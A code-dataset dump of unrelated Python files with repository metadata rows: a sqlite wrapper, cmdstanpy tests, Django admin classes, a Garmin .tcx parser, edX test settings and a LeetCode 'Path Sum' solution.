                cur.execute(sql, param)
                self._con.commit()
            except sqlite.Error:
                result = False
                if self._raise_exception:
                    raise
            except sqlite.Warning:
                result = False
                if self._raise_warning:
                    raise
            finally:
                if cur:
                    cur.close()
            return result

    def query(self, sql, param=None):
        """
        Use this method to query your database.
        Formally: Data Query Language (DQL).

        Returns a tuple (column_names, data):
        column_names is the list of column names related to the data,
        data is the list of rows returned by the query.
        Example: ( ["id", "name", "age"], [(1, "Jack", 50)] )
        (Note: earlier docs stated the reverse order; names come first.)
        This method can raise sqlite.Error, sqlite.Warning
        """
        with self._lock:
            param = () if param is None else param
            description = []
            data = []
            cur = None
            try:
                cur = self._con.cursor()
                cur.execute(sql, param)
                data = cur.fetchall()
                description = cur.description
            except sqlite.Error:
                if self._raise_exception:
                    raise
            except sqlite.Warning:
                if self._raise_warning:
                    raise
            finally:
                if cur:
                    cur.close()
            # cursor.description entries are 7-tuples; keep only the names.
            return [x[0] for x in description], data

    def script(self, script):
        """
        Executes the script as an sql-script. Meaning: there are multiple lines of sql.
        This method returns nothing but could raise sqlite.Error, sqlite.Warning.
        script could be a path to a file, a file-like object or just a string.
        """
        with self._lock:
            cur = None
            try:
                script = self._stringify_script(script)
                cur = self._con.cursor()
                cur.executescript(script)
            except sqlite.Error:
                if self._raise_exception:
                    raise
            except sqlite.Warning:
                if self._raise_warning:
                    raise
            finally:
                if cur:
                    cur.close()

    def export(self):
        """
        export the database: it returns a string of sql code.
        This method can raise sqlite.Error, sqlite.Warning
        """
        with self._lock:
            result = ""
            try:
                # BUG FIX: the dump was previously computed but never
                # assigned, so export() always returned "".
                result = "\n".join(self._con.iterdump())
            except sqlite.Error:
                if self._raise_exception:
                    raise
            except sqlite.Warning:
                if self._raise_warning:
                    raise
            return result

    def tables(self):
        """
        Returns the list of tables names.
        Example: ["table_1", "table_2"]
        Internal sqlite_* tables are excluded.
        This method can raise sqlite.Error, sqlite.Warning
        """
        with self._lock:
            data = []
            cur = None
            try:
                cur = self._con.cursor()
                cur.execute("SELECT name FROM sqlite_master WHERE type='table' AND name NOT LIKE 'sqlite_%'")
                data = cur.fetchall()
            except sqlite.Error:
                if self._raise_exception:
                    raise
            except sqlite.Warning:
                if self._raise_warning:
                    raise
            finally:
                if cur:
                    cur.close()
            return [item[0] for item in data]

    def columns(self, table):
        """
        Returns the list of columns names of the given table name
        A column is like:
        (int_id, str_column_name, str_column_datatype, int_boolean_nullability,
        default_value, int_primary_key)
        Example:
        [(0, "id", "INTEGER", 1, None, 1),
        (1, "name", "TEXT", 0, None, 0),
        (2, "age", "INTEGER", 1, None, 0)]
        This method can raise sqlite.Error, sqlite.Warning
        """
        with self._lock:
            data = []
            cur = None
            try:
                cur = self._con.cursor()
                # NOTE(review): PRAGMAs cannot take bound parameters, so the
                # table name is interpolated — don't pass untrusted names.
                cur.execute("pragma table_info('{}')".format(table))
                data = cur.fetchall()
            except sqlite.Error:
                if self._raise_exception:
                    raise
            except sqlite.Warning:
                if self._raise_warning:
                    raise
            finally:
                if cur:
                    cur.close()
            return data

    def close(self):
        """
        Well, it closes the connection
        """
        with self._lock:
            if self._con:
                try:
                    self._con.close()
                except Exception:
                    # Best-effort close; failures are deliberately ignored.
                    pass
                self._con = None
                # Drop the atexit hook registered in __init__.
                atexit.unregister(self.close)

    def _stringify_script(self, script):
        """ This method will:
        - try to read the script: if the script is a file-like object,
        the content (string) will be returned
        - try to open the script: if the script is a path to a file,
        the content (string) will be returned
        - if the script is already a string, it will be returned as it,
        - the script will be returned as it if failed to read/open
        """
        # if script is a file-like object
        try:
            script = script.read()
        except Exception:
            pass
        else:
            return script
        # if script is a path to a file
        try:
            with open(script, "r") as file:
                script = file.read()
        except Exception:
            pass
        else:
            return script
        return script
class Error(Exception):
    """Base exception that keeps its first positional argument as .message."""

    def __init__(self, *args, **kwargs):
        if args:
            self.message = args[0]
        else:
            self.message = ""
        super().__init__(self.message)

    def __str__(self):
        return self.message
7563d761b6b45d37317527e311c9b9997d563f4b | 760 | py | Python | tools/init_paths.py | ys7yoo/HRNet | 264414c06d64aa0b4327930b8f612a50fc6450cd | [
"MIT"
] | null | null | null | tools/init_paths.py | ys7yoo/HRNet | 264414c06d64aa0b4327930b8f612a50fc6450cd | [
"MIT"
] | 3 | 2019-10-27T13:19:32.000Z | 2019-10-28T10:05:16.000Z | tools/init_paths.py | ys7yoo/HRNet | 264414c06d64aa0b4327930b8f612a50fc6450cd | [
"MIT"
] | null | null | null | ## MODIFIED FROM _init_paths.py
import os
import sys
PATH_CURRENT = os.path.abspath(os.path.dirname(__file__))
# print(PATH_CURRENT)
# get parent dir: https://stackoverflow.com/questions/2860153/how-do-i-get-the-parent-directory-in-python
from pathlib import Path
PATH_PARENT = Path(PATH_CURRENT).parent
#PATH_PARENT = os.path.abspath(os.path.dirname(__file__)+os.path.sep+os.pardir) # THIS DOESN'T WORK IN SOME ENVIRONMENTS
#print(PATH_PARENT)
PATH_LIB = os.path.join(PATH_PARENT, 'lib')
#print(PATH_LIB)
add_path(PATH_LIB)
PATH_MM = os.path.join(PATH_PARENT, 'lib/poseeval/py-motmetrics')
add_path(PATH_MM)
#print(sys.path)
| 26.206897 | 120 | 0.746053 | ## MODIFIED FROM _init_paths.py
import os
import sys
def add_path(path):
    """Append *path* to sys.path unless it is already present."""
    if path in sys.path:
        return
    sys.path.append(path)
# Directory containing this script (tools/).
PATH_CURRENT = os.path.abspath(os.path.dirname(__file__))
# print(PATH_CURRENT)
# get parent dir: https://stackoverflow.com/questions/2860153/how-do-i-get-the-parent-directory-in-python
from pathlib import Path
# Repository root (parent of tools/).
PATH_PARENT = Path(PATH_CURRENT).parent
#PATH_PARENT = os.path.abspath(os.path.dirname(__file__)+os.path.sep+os.pardir) # THIS DOESN'T WORK IN SOME ENVIRONMENTS
#print(PATH_PARENT)
# Put <root>/lib on sys.path so project modules import without installation.
PATH_LIB = os.path.join(PATH_PARENT, 'lib')
#print(PATH_LIB)
add_path(PATH_LIB)
# Vendored py-motmetrics used by the pose evaluation code.
PATH_MM = os.path.join(PATH_PARENT, 'lib/poseeval/py-motmetrics')
add_path(PATH_MM)
#print(sys.path)
| 104 | 0 | 23 |
dcbe0f04a0fe2c456ffd41f8434bc8e697bca643 | 12,349 | py | Python | test/test_cmds.py | codeLovingYogi/cmdstanpy | b9d418c98535fb5571ae70058c73f75eac3637f7 | [
"BSD-3-Clause"
] | null | null | null | test/test_cmds.py | codeLovingYogi/cmdstanpy | b9d418c98535fb5571ae70058c73f75eac3637f7 | [
"BSD-3-Clause"
] | null | null | null | test/test_cmds.py | codeLovingYogi/cmdstanpy | b9d418c98535fb5571ae70058c73f75eac3637f7 | [
"BSD-3-Clause"
] | null | null | null | import io
import os
import os.path
import sys
import unittest
from cmdstanpy import TMPDIR
from cmdstanpy.lib import Model, SamplerArgs, RunSet
from cmdstanpy.cmds import compile_model, sample, summary, diagnose
from cmdstanpy.cmds import get_drawset, save_csvfiles
datafiles_path = os.path.join('test', 'data')
# TODO: test compile with existing exe - timestamp on exe unchanged
# TODO: test overwrite with existing exe - timestamp on exe updated
if __name__ == '__main__':
unittest.main()
| 39.453674 | 80 | 0.616244 | import io
import os
import os.path
import sys
import unittest
from cmdstanpy import TMPDIR
from cmdstanpy.lib import Model, SamplerArgs, RunSet
from cmdstanpy.cmds import compile_model, sample, summary, diagnose
from cmdstanpy.cmds import get_drawset, save_csvfiles
datafiles_path = os.path.join('test', 'data')
class CompileTest(unittest.TestCase):
def test_good(self):
stan = os.path.join(datafiles_path, 'bernoulli.stan')
exe = os.path.join(datafiles_path, 'bernoulli')
if os.path.exists(exe):
os.remove(exe)
model = compile_model(stan)
self.assertEqual(stan, model.stan_file)
self.assertTrue(model.exe_file.endswith(exe))
def test_include(self):
stan = os.path.join(datafiles_path, 'bernoulli_include.stan')
exe = os.path.join(datafiles_path, 'bernoulli_include')
here = os.path.dirname(os.path.abspath(__file__))
datafiles_abspath = os.path.join(here, 'data')
include_paths = [datafiles_abspath]
if os.path.exists(exe):
os.remove(exe)
model = compile_model(stan, include_paths=include_paths)
self.assertEqual(stan, model.stan_file)
self.assertTrue(model.exe_file.endswith(exe))
def test_bad(self):
stan = os.path.join(TMPDIR, 'bbad.stan')
with self.assertRaises(Exception):
model = compile_model(stan)
# TODO: test compile with existing exe - timestamp on exe unchanged
# TODO: test overwrite with existing exe - timestamp on exe updated
class SampleTest(unittest.TestCase):
    """sample(): running the NUTS sampler and checking its outputs."""

    def test_bernoulli_1(self):
        # Full run with an explicit csv_output_file; checks files on disk,
        # run metadata and the assembled sample's shape.
        stan = os.path.join(datafiles_path, 'bernoulli.stan')
        exe = os.path.join(datafiles_path, 'bernoulli')
        if not os.path.exists(exe):
            compile_model(stan)
        model = Model(stan, exe_file=exe)
        jdata = os.path.join(datafiles_path, 'bernoulli.data.json')
        output = os.path.join(datafiles_path, 'test1-bernoulli-output')
        post_sample = sample(
            model,
            chains=4,
            cores=2,
            seed=12345,
            sampling_iters=100,
            data=jdata,
            csv_output_file=output,
            max_treedepth=11,
            adapt_delta=0.95,
        )
        # One csv + one console txt file per chain.
        for i in range(post_sample.chains):
            csv_file = post_sample.csv_files[i]
            txt_file = ''.join([os.path.splitext(csv_file)[0], '.txt'])
            self.assertTrue(os.path.exists(csv_file))
            self.assertTrue(os.path.exists(txt_file))
        self.assertEqual(post_sample.chains, 4)
        self.assertEqual(post_sample.draws, 100)
        # Seven sampler-state columns plus the single model parameter theta.
        column_names = [
            'lp__',
            'accept_stat__',
            'stepsize__',
            'treedepth__',
            'n_leapfrog__',
            'divergent__',
            'energy__',
            'theta',
        ]
        self.assertEqual(post_sample.column_names, tuple(column_names))
        post_sample.assemble_sample()
        # Shape is (draws, chains, columns).
        self.assertEqual(post_sample.sample.shape, (100, 4, len(column_names)))
        self.assertEqual(post_sample.metric_type, 'diag_e')
        self.assertEqual(post_sample.stepsize.shape, (4,))
        self.assertEqual(post_sample.metric.shape, (4, 1))

    def test_bernoulli_2(self):
        # tempfile for outputs
        stan = os.path.join(datafiles_path, 'bernoulli.stan')
        exe = os.path.join(datafiles_path, 'bernoulli')
        if not os.path.exists(exe):
            compile_model(stan)
        model = Model(stan, exe_file=exe)
        jdata = os.path.join(datafiles_path, 'bernoulli.data.json')
        post_sample = sample(
            model,
            chains=4,
            cores=2,
            seed=12345,
            sampling_iters=100,
            data=jdata,
            max_treedepth=11,
            adapt_delta=0.95,
        )
        for i in range(post_sample.chains):
            csv_file = post_sample.csv_files[i]
            txt_file = ''.join([os.path.splitext(csv_file)[0], '.txt'])
            self.assertTrue(os.path.exists(csv_file))
            self.assertTrue(os.path.exists(txt_file))

    def test_bernoulli_rdata(self):
        # Data supplied as an Rdump file instead of JSON.
        rdata = os.path.join(datafiles_path, 'bernoulli.data.R')
        stan = os.path.join(datafiles_path, 'bernoulli.stan')
        output = os.path.join(TMPDIR, 'test3-bernoulli-output')
        model = compile_model(stan)
        post_sample = sample(model, data=rdata, csv_output_file=output)
        for i in range(post_sample.chains):
            csv_file = post_sample.csv_files[i]
            txt_file = ''.join([os.path.splitext(csv_file)[0], '.txt'])
            self.assertTrue(os.path.exists(csv_file))
            self.assertTrue(os.path.exists(txt_file))

    def test_bernoulli_data(self):
        # Data supplied directly as a Python dict.
        data_dict = {'N': 10, 'y': [0, 1, 0, 0, 0, 0, 0, 0, 0, 1]}
        stan = os.path.join(datafiles_path, 'bernoulli.stan')
        output = os.path.join(TMPDIR, 'test3-bernoulli-output')
        model = compile_model(stan)
        post_sample = sample(model, data=data_dict, csv_output_file=output)
        for i in range(post_sample.chains):
            csv_file = post_sample.csv_files[i]
            txt_file = ''.join([os.path.splitext(csv_file)[0], '.txt'])
            self.assertTrue(os.path.exists(csv_file))
            self.assertTrue(os.path.exists(txt_file))

    def test_missing_input(self):
        # Sampling without required data must fail.
        stan = os.path.join(datafiles_path, 'bernoulli.stan')
        output = os.path.join(TMPDIR, 'test4-bernoulli-output')
        model = compile_model(stan)
        with self.assertRaisesRegex(Exception, 'Error during sampling'):
            post_sample = sample(model, csv_output_file=output)
class DrawsetTest(unittest.TestCase):
    """get_drawset(): flattening posterior samples into a DataFrame."""

    def test_bernoulli(self):
        stan = os.path.join(datafiles_path, 'bernoulli.stan')
        exe = os.path.join(datafiles_path, 'bernoulli')
        if not os.path.exists(exe):
            compile_model(stan)
        model = Model(stan, exe_file=exe)
        jdata = os.path.join(datafiles_path, 'bernoulli.data.json')
        post_sample = sample(
            model, chains=4, cores=2, seed=12345, sampling_iters=200, data=jdata
        )
        post_sample.assemble_sample()
        df = get_drawset(post_sample)
        # One row per (chain, draw) pair, one column per sampler variable.
        self.assertEqual(
            df.shape,
            (
                post_sample.chains * post_sample.draws,
                len(post_sample.column_names),
            ),
        )

    def test_sample_big(self):
        # construct runset using existing sampler output
        stan = os.path.join(datafiles_path, 'bernoulli.stan')
        exe = os.path.join(datafiles_path, 'bernoulli')
        model = Model(exe_file=exe, stan_file=stan)
        output = os.path.join(datafiles_path, 'runset-big', 'output_icar_nyc')
        args = SamplerArgs(model, chain_ids=[1, 2], output_file=output)
        runset = RunSet(chains=2, args=args)
        runset.validate_csv_files()
        runset.assemble_sample()
        sampler_state = [
            'lp__',
            'accept_stat__',
            'stepsize__',
            'treedepth__',
            'n_leapfrog__',
            'divergent__',
            'energy__',
        ]
        # The ICAR model has a 2095-element phi vector.
        phis = ['phi.{}'.format(str(x + 1)) for x in range(2095)]
        column_names = sampler_state + phis
        self.assertEqual(runset.columns, len(column_names))
        self.assertEqual(runset.column_names, tuple(column_names))
        self.assertEqual(runset.metric_type, 'diag_e')
        self.assertEqual(runset.stepsize.shape, (2,))
        self.assertEqual(runset.metric.shape, (2, 2095))
        self.assertEqual((1000, 2, 2102), runset.sample.shape)
        # 'phi' alone selects the whole vector; 'phi.N' a single component.
        phis = get_drawset(runset, params=['phi'])
        self.assertEqual((2000, 2095), phis.shape)
        phi1 = get_drawset(runset, params=['phi.1'])
        self.assertEqual((2000, 1), phi1.shape)
        mo_phis = get_drawset(runset, params=['phi.1', 'phi.10', 'phi.100'])
        self.assertEqual((2000, 3), mo_phis.shape)
        phi2095 = get_drawset(runset, params=['phi.2095'])
        self.assertEqual((2000, 1), phi2095.shape)
        # Out-of-range index and unknown name must both raise.
        with self.assertRaises(Exception):
            get_drawset(runset, params=['phi.2096'])
        with self.assertRaises(Exception):
            get_drawset(runset, params=['ph'])
class SummaryTest(unittest.TestCase):
    """summary(): stansummary statistics over a posterior sample."""

    def test_bernoulli(self):
        stan = os.path.join(datafiles_path, 'bernoulli.stan')
        exe = os.path.join(datafiles_path, 'bernoulli')
        if not os.path.exists(exe):
            compile_model(stan)
        model = Model(stan, exe_file=exe)
        jdata = os.path.join(datafiles_path, 'bernoulli.data.json')
        post_sample = sample(
            model, chains=4, cores=2, seed=12345, sampling_iters=200, data=jdata
        )
        df = summary(post_sample)
        # Two rows (lp__, theta) by nine summary-statistic columns.
        self.assertTrue(df.shape == (2, 9))
class DiagnoseTest(unittest.TestCase):
    """diagnose(): printed diagnostics for sampler pathologies."""

    # NOTE(review): this method name lacks the 'test_' prefix, so unittest
    # discovery never runs it — rename to test_diagnose_no_problems to enable.
    def diagnose_no_problems(self):
        stan = os.path.join(datafiles_path, 'bernoulli.stan')
        exe = os.path.join(datafiles_path, 'bernoulli')
        if not os.path.exists(exe):
            compile_model(stan)
        model = Model(stan, exe_file=exe)
        jdata = os.path.join(datafiles_path, 'bernoulli.data.json')
        post_sample = sample(
            model, chains=4, cores=2, seed=12345, sampling_iters=200, data=jdata
        )
        # Capture stdout to inspect what diagnose() prints.
        capturedOutput = io.StringIO()
        sys.stdout = capturedOutput
        diagnose(post_sample)
        sys.stdout = sys.__stdout__
        self.assertEqual(capturedOutput.getvalue(), 'No problems detected.\n')

    def test_diagnose_divergences(self):
        # Pre-recorded output known to saturate treedepth 8.
        stan = os.path.join(datafiles_path, 'bernoulli.stan')
        exe = os.path.join(datafiles_path, 'bernoulli')
        model = Model(exe_file=exe, stan_file=stan)
        output = os.path.join(
            datafiles_path, 'diagnose-good', 'corr_gauss_depth8'
        )
        args = SamplerArgs(model, chain_ids=[1], output_file=output)
        runset = RunSet(args=args, chains=1)
        # TODO - use cmdstan test files instead
        expected = ''.join(
            [
                '424 of 1000 (42%) transitions hit the maximum ',
                'treedepth limit of 8, or 2^8 leapfrog steps. ',
                'Trajectories that are prematurely terminated ',
                'due to this limit will result in slow ',
                'exploration and you should increase the ',
                'limit to ensure optimal performance.\n',
            ]
        )
        capturedOutput = io.StringIO()
        sys.stdout = capturedOutput
        diagnose(runset)
        sys.stdout = sys.__stdout__
        self.assertEqual(capturedOutput.getvalue(), expected)
class SaveCsvfilesTest(unittest.TestCase):
    """save_csvfiles(): moving sampler csv outputs to a chosen location."""

    def test_bernoulli(self):
        stan = os.path.join(datafiles_path, 'bernoulli.stan')
        exe = os.path.join(datafiles_path, 'bernoulli')
        if not os.path.exists(exe):
            compile_model(stan)
        model = Model(stan, exe_file=exe)
        jdata = os.path.join(datafiles_path, 'bernoulli.data.json')
        post_sample = sample(
            model, chains=4, cores=2, seed=12345, sampling_iters=200, data=jdata
        )
        for i in range(post_sample.chains):
            csv_file = post_sample.csv_files[i]
            txt_file = ''.join([os.path.splitext(csv_file)[0], '.txt'])
            self.assertTrue(os.path.exists(csv_file))
            self.assertTrue(os.path.exists(txt_file))
        basename = 'bern_save_csvfiles_test'
        save_csvfiles(post_sample, datafiles_path, basename)  # good
        for i in range(post_sample.chains):
            csv_file = post_sample.csv_files[i]
            self.assertTrue(os.path.exists(csv_file))
        # Destination directory must exist...
        with self.assertRaisesRegex(Exception, 'cannot save'):
            save_csvfiles(
                post_sample, os.path.join('no', 'such', 'dir'), basename
            )
        # ...and existing files must not be overwritten.
        with self.assertRaisesRegex(Exception, 'file exists'):
            save_csvfiles(post_sample, datafiles_path, basename)
        save_csvfiles(post_sample, basename=basename)  # default dir
        for i in range(post_sample.chains):
            csv_file = post_sample.csv_files[i]
            self.assertTrue(os.path.exists(csv_file))
        for i in range(post_sample.chains):  # cleanup
            os.remove(post_sample.csv_files[i])
# Allow running this test module directly: python test_cmds.py
if __name__ == '__main__':
    unittest.main()
| 11,224 | 101 | 510 |
76f40d02bacdbe3d6b3f25ee64fc6153b4cf533b | 404 | py | Python | django/app/tasks.py | shimakaze-git/docker_django_celery_vote | 0b0899a9fb4d817ff5966e9d1f1f027755e585cf | [
"BSD-2-Clause"
] | null | null | null | django/app/tasks.py | shimakaze-git/docker_django_celery_vote | 0b0899a9fb4d817ff5966e9d1f1f027755e585cf | [
"BSD-2-Clause"
] | null | null | null | django/app/tasks.py | shimakaze-git/docker_django_celery_vote | 0b0899a9fb4d817ff5966e9d1f1f027755e585cf | [
"BSD-2-Clause"
] | null | null | null | from django.template.loader import get_template | 26.933333 | 47 | 0.685644 | from django.template.loader import get_template
def get_message(item, action):
    """Render the notification body from the app/message.txt template."""
    template = get_template('app/message.txt')
    return template.render({"item": item, "action": action})
def send_notification(item, action):
    """Build the notification message for *item*/*action*.

    The actual delivery tasks are currently disabled (commented out), so
    this renders the message and discards it.
    """
    message = get_message(item, action)
    # send_slack_message.delay(message)
    # send_email.delay(message)
f2d98036f31e9ac0c6c4d125d74180c592d5c6c2 | 1,782 | py | Python | functions/getTcxData.py | TomBolton/aeroCode | 7e26ffb295cb76367a57993420fb93f976df9199 | [
"MIT"
] | 1 | 2016-12-18T18:36:47.000Z | 2016-12-18T18:36:47.000Z | functions/getTcxData.py | TomBolton/aeroCode | 7e26ffb295cb76367a57993420fb93f976df9199 | [
"MIT"
] | null | null | null | functions/getTcxData.py | TomBolton/aeroCode | 7e26ffb295cb76367a57993420fb93f976df9199 | [
"MIT"
] | null | null | null | # This script will extract the important ride data from a .tcx
# file specified by the user. The code below will then extract
# the speed and power values at each time step. The data recording
# of the Garmin MUST be set to one data point per second, as the
# analysis assumes a time-step of 1 second.
import lxml.etree as ET
import os
from os import path
| 34.269231 | 100 | 0.615039 | # This script will extract the important ride data from a .tcx
# file specified by the user. The code below will then extract
# the speed and power values at each time step. The data recording
# of the Garmin MUST be set to one data point per second, as the
# analysis assumes a time-step of 1 second.
import lxml.etree as ET
import os
from os import path
def getTcxData( fileName ) : # Input is the filename, e.g. my_ride.tcx.
    """Parse a .tcx activity file and return [powerList, speedList].

    NOTE(review): assumes the Garmin recorded exactly one sample per
    second — "speed" below is really the per-sample distance delta.
    """
    # Make a string of the path to the tcx file.
    pathStr = str( path.realpath( fileName ) )
    # Read .tcx file into a Document Object Model (DOM).
    dom = ET.parse( pathStr )
    root = dom.getroot()
    # We're interested in the distance travelled and watts. The route to
    # watts is the following:
    #
    # <Element>
    # <TraingCenterDatabase ...>
    # <Activities>
    # <Activity Sport="Biking">
    # <Lap StartTime="...">
    # <Track>
    # <Trackpoint>
    # <Extensions>
    #
    # NOTE(review): the hard-coded indices below assume a single activity
    # with a single lap and a fixed Trackpoint child order — presumably
    # child [7] holds the watts extension and child [3] the distance;
    # verify against files from other devices.
    trackPoints = root[0][0][1][9] # This extracts the moment-by-moment data from the xml tree.
    powerList = []
    speedList = []
    # Loop through the track points and extract both the power and speed data
    for i in range(2,len(trackPoints)-1) :
        powerList.append( int( trackPoints[i][7][0][0].text ) )
        speedList.append( float( trackPoints[i][3].text ) - float( trackPoints[i-1][3].text ) )
    # The turning around points sometimes register as zero speed even though
    # the cyclist is still moving. Therefore replace the zero values with a
    # small value of 0.5m/s.
    for i in range(0, len(speedList)) :
        if speedList[i] < 0.2 :
            speedList[i] = 0.5
    return [powerList,speedList]
| 1,401 | 0 | 23 |
4b834fdd7c8b2ebcd71b69384ea4dad7f6c6b6c1 | 295 | py | Python | Part-03-Understanding-Software-Crafting-Your-Own-Tools/models/edx-platform/common/test/acceptance/pages/lms/__init__.py | osoco/better-ways-of-thinking-about-software | 83e70d23c873509e22362a09a10d3510e10f6992 | [
"MIT"
] | 3 | 2021-12-15T04:58:18.000Z | 2022-02-06T12:15:37.000Z | Part-03-Understanding-Software-Crafting-Your-Own-Tools/models/edx-platform/common/test/acceptance/pages/lms/__init__.py | osoco/better-ways-of-thinking-about-software | 83e70d23c873509e22362a09a10d3510e10f6992 | [
"MIT"
] | null | null | null | Part-03-Understanding-Software-Crafting-Your-Own-Tools/models/edx-platform/common/test/acceptance/pages/lms/__init__.py | osoco/better-ways-of-thinking-about-software | 83e70d23c873509e22362a09a10d3510e10f6992 | [
"MIT"
] | 1 | 2019-01-02T14:38:50.000Z | 2019-01-02T14:38:50.000Z | """
Package of lms page objects for acceptance tests
"""
import os
# Get the URL of the instance under test
HOSTNAME = os.environ.get('BOK_CHOY_HOSTNAME', 'localhost')
LMS_PORT = os.environ.get('BOK_CHOY_LMS_PORT', 8003)
BASE_URL = os.environ.get('test_url', f'http://{HOSTNAME}:{LMS_PORT}')
| 24.583333 | 70 | 0.732203 | """
Package of lms page objects for acceptance tests
"""
import os
# Get the URL of the instance under test
HOSTNAME = os.environ.get('BOK_CHOY_HOSTNAME', 'localhost')
LMS_PORT = os.environ.get('BOK_CHOY_LMS_PORT', 8003)
BASE_URL = os.environ.get('test_url', f'http://{HOSTNAME}:{LMS_PORT}')
| 0 | 0 | 0 |
d1cf3c14f61b807c9522bcfdd5c5441669891163 | 622 | py | Python | web/ml/admin.py | MTES-MCT/biocarburants | ff084916e18cdbdc41400f36fa6cc76a5e05900e | [
"MIT"
] | null | null | null | web/ml/admin.py | MTES-MCT/biocarburants | ff084916e18cdbdc41400f36fa6cc76a5e05900e | [
"MIT"
] | 1 | 2020-02-17T11:01:03.000Z | 2020-02-17T11:01:03.000Z | web/ml/admin.py | MTES-MCT/biocarburants | ff084916e18cdbdc41400f36fa6cc76a5e05900e | [
"MIT"
] | null | null | null | from django.contrib import admin
# Register your models here.
from ml.models import EECStats, EPStats, ETDStats
@admin.register(EECStats)
@admin.register(EPStats)
@admin.register(ETDStats)
| 34.555556 | 123 | 0.737942 | from django.contrib import admin
# Register your models here.
from ml.models import EECStats, EPStats, ETDStats
# Admin changelist screens for the ML stats models; @admin.register binds
# each ModelAdmin to its model.
@admin.register(EECStats)
class EECStatsAdmin(admin.ModelAdmin):
    # Columns shown in the changelist, plus sidebar filters.
    list_display = ('feedstock', 'origin', 'nb_lots', 'default_value', 'stddev', 'average')
    list_filter = ('feedstock', 'origin',)


@admin.register(EPStats)
class EPStatsAdmin(admin.ModelAdmin):
    list_display = ('feedstock', 'biofuel', 'nb_lots', 'default_value_min_ep', 'default_value_max_ep', 'stddev', 'average')


@admin.register(ETDStats)
class ETDStatsAdmin(admin.ModelAdmin):
    list_display = ('feedstock', 'default_value')
| 0 | 359 | 66 |
f8bb05792786b247bfb57d1e945a780db3af525b | 2,816 | py | Python | leetcode/Depth First Search & Backtracking/112. Path Sum.py | yanshengjia/algorithm | 0608d286be9c93d51768d47f21e569c6b0be9cda | [
"MIT"
] | 23 | 2019-08-02T12:02:47.000Z | 2022-03-09T15:24:16.000Z | leetcode/Depth First Search & Backtracking/112. Path Sum.py | yanshengjia/algorithm | 0608d286be9c93d51768d47f21e569c6b0be9cda | [
"MIT"
] | null | null | null | leetcode/Depth First Search & Backtracking/112. Path Sum.py | yanshengjia/algorithm | 0608d286be9c93d51768d47f21e569c6b0be9cda | [
"MIT"
] | 21 | 2019-12-22T04:47:32.000Z | 2021-09-12T14:29:35.000Z | """
Given a binary tree and a sum, determine if the tree has a root-to-leaf path such that adding up all the values along the path equals the given sum.
Note: A leaf is a node with no children.
Example:
Given the below binary tree and sum = 22,
5
/ \
4 8
/ / \
11 13 4
/ \ \
7 2 1
return true, as there exist a root-to-leaf path 5->4->11->2 which sum is 22.
Solution:
1. dfs + recursion
2. bfs + stack
So we start from a stack which contains the root node and the corresponding remaining sum which is sum - root.val. Then we proceed to the iterations: pop the current node out of the stack and return True if the remaining sum is 0 and we're on the leaf node. If the remaining sum is not zero or we're not on the leaf yet then we push the child nodes and corresponding remaining sums into stack.
"""
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
# DFS + Recursion
# Time-O(N), where N is the number of nodes in the tree
# Space-worst O(N), best O(logN)
# Space complexity : in the worst case, the tree is completely unbalanced, e.g. each node has only one child node, the recursion call would occur NN times (the height of the tree), therefore the storage to keep the call stack would be \mathcal{O}(N)O(N). But in the best case (the tree is completely balanced), the height of the tree would be \log(N)log(N). Therefore, the space complexity in this case would be \mathcal{O}(\log(N))O(log(N)).
# BFS + Stack
# Use stack to store each node's condition, [node, remaining value], updating the remaining sum to cumulate at each visit.
# Time - O(N)
# Space - [O(logN), O(N)]
| 36.571429 | 443 | 0.615767 | """
Given a binary tree and a sum, determine if the tree has a root-to-leaf path such that adding up all the values along the path equals the given sum.
Note: A leaf is a node with no children.
Example:
Given the below binary tree and sum = 22,
5
/ \
4 8
/ / \
11 13 4
/ \ \
7 2 1
return true, as there exist a root-to-leaf path 5->4->11->2 which sum is 22.
Solution:
1. dfs + recursion
2. bfs + stack
So we start from a stack which contains the root node and the corresponding remaining sum which is sum - root.val. Then we proceed to the iterations: pop the current node out of the stack and return True if the remaining sum is 0 and we're on the leaf node. If the remaining sum is not zero or we're not on the leaf yet then we push the child nodes and corresponding remaining sums into stack.
"""
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
# DFS + Recursion
# Time-O(N), where N is the number of nodes in the tree
# Space-worst O(N), best O(logN)
# Space complexity : in the worst case, the tree is completely unbalanced, e.g. each node has only one child node, the recursion call would occur NN times (the height of the tree), therefore the storage to keep the call stack would be \mathcal{O}(N)O(N). But in the best case (the tree is completely balanced), the height of the tree would be \log(N)log(N). Therefore, the space complexity in this case would be \mathcal{O}(\log(N))O(log(N)).
class Solution:
    """DFS + recursion.

    Time O(N); space O(H) for the call stack, where H is the tree height
    (O(N) worst case for a degenerate tree, O(log N) when balanced).
    """

    def hasPathSum(self, root: 'TreeNode', sum: int) -> bool:
        """Return True iff some root-to-leaf path adds up to `sum`.

        Fixes vs. original: `is None` instead of `== None`; the annotation
        is quoted since TreeNode is only defined in the judge environment;
        the redundant boolean if/else is collapsed.
        """
        if root is None:
            return False
        # Leaf: the path ends here; the remaining target must be matched.
        if root.left is None and root.right is None:
            return root.val == sum
        remaining = sum - root.val
        return (self.hasPathSum(root.left, remaining)
                or self.hasPathSum(root.right, remaining))
# BFS + Stack
# Use stack to store each node's condition, [node, remaining value], updating the remaining sum to cumulate at each visit.
# Time - O(N)
# Space - [O(logN), O(N)]
class Solution:
    def hasPathSum(self, root, sum):
        """
        Iterative depth-first search with an explicit stack.

        Each stack entry pairs a node with the remaining target after
        subtracting that node's value; a leaf with remaining 0 proves a
        valid root-to-leaf path.

        :type root: TreeNode
        :type sum: int
        :rtype: bool
        """
        if not root:
            return False
        stack = [(root, sum - root.val)]
        while stack:
            node, remaining = stack.pop()
            is_leaf = not node.left and not node.right
            if is_leaf and remaining == 0:
                return True
            for child in (node.right, node.left):
                if child:
                    stack.append((child, remaining - child.val))
        return False
b1e550d7831a4be263bbb48382a1b7866b34b3ed | 694 | py | Python | OpenGLWrapper_JE/venv/Lib/site-packages/OpenGL/raw/GLX/MESA/pixmap_colormap.py | JE-Chen/je_old_repo | a8b2f1ac2eec25758bd15b71c64b59b27e0bcda5 | [
"MIT"
] | null | null | null | OpenGLWrapper_JE/venv/Lib/site-packages/OpenGL/raw/GLX/MESA/pixmap_colormap.py | JE-Chen/je_old_repo | a8b2f1ac2eec25758bd15b71c64b59b27e0bcda5 | [
"MIT"
